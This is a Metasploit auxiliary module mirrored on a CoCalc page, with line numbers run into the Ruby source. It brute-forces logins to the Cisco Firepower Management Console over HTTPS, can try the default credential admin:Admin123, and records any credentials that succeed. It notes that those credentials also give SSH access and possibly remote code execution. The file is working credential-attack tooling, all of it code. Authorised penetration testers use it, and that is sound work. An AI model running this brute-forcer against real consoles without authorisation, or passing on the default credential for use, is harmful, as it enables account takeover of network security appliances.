CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/http/cisco_firepower_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/login_scanner/cisco_firepower'6require 'metasploit/framework/credential_collection'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::HttpClient10include Msf::Auxiliary::AuthBrute11include Msf::Auxiliary::Report12include Msf::Auxiliary::Scanner1314def initialize(info={})15super(update_info(info,16'Name' => 'Cisco Firepower Management Console 6.0 Login',17'Description' => %q{18This module attempts to authenticate to a Cisco Firepower Management console via HTTPS.19The credentials are also used for SSH, which could allow remote code execution.20},21'Author' => [ 'sinn3r' ],22'License' => MSF_LICENSE,23'DefaultOptions' =>24{25'RPORT' => 443,26'SSL' => true,27'SSLVersion' => 'Auto'28}29))3031register_options(32[33OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),34OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:Admin123', false])35])36end373839def scanner(ip)40@scanner ||= lambda {41cred_collection = build_credential_collection(42username: datastore['USERNAME'],43password: datastore['PASSWORD']44)4546if datastore['TRYDEFAULT']47print_status("Default credential admin:Admin123 added to the credential queue for testing.")48cred_collection.add_public('admin')49cred_collection.add_private('Admin123')50end5152return Metasploit::Framework::LoginScanner::CiscoFirepower.new(53configure_http_login_scanner(54host: ip,55port: datastore['RPORT'],56cred_details: cred_collection,57stop_on_success: datastore['STOP_ON_SUCCESS'],58bruteforce_speed: datastore['BRUTEFORCE_SPEED'],59connection_timeout: 5,60http_username: datastore['HttpUsername'],61http_password: datastore['HttpPassword'],62uri: target_uri.path63))64}.call65end666768def report_good_cred(ip, port, result)69service_data = {70address: ip,71port: port,72service_name: 'http',73protocol: 'tcp',74workspace_id: myworkspace_id75}7677credential_data = {78module_fullname: self.fullname,79origin_type: :service,80private_data: result.credential.private,81private_type: :password,82username: result.credential.public,83}.merge(service_data)8485login_data = {86core: create_credential(credential_data),87last_attempted_at: DateTime.now,88status: result.status,89proof: result.proof90}.merge(service_data)9192create_credential_login(login_data)93end949596def report_bad_cred(ip, rport, result)97invalidate_login(98address: ip,99port: rport,100protocol: 'tcp',101public: result.credential.public,102private: result.credential.private,103realm_key: result.credential.realm_key,104realm_value: result.credential.realm,105status: result.status,106proof: result.proof107)108end109110def bruteforce(ip)111scanner(ip).scan! do |result|112case result.status113when Metasploit::Model::Login::Status::SUCCESSFUL114print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")115report_good_cred(ip, rport, result)116when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT117vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)118report_bad_cred(ip, rport, result)119when Metasploit::Model::Login::Status::INCORRECT120vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")121report_bad_cred(ip, rport, result)122end123end124end125126def run_host(ip)127unless scanner(ip).check_setup128print_brute(:level => :error, :ip => ip, :msg => 'Target is not Cisco Firepower Management console.')129return130end131132bruteforce(ip)133end134end135136137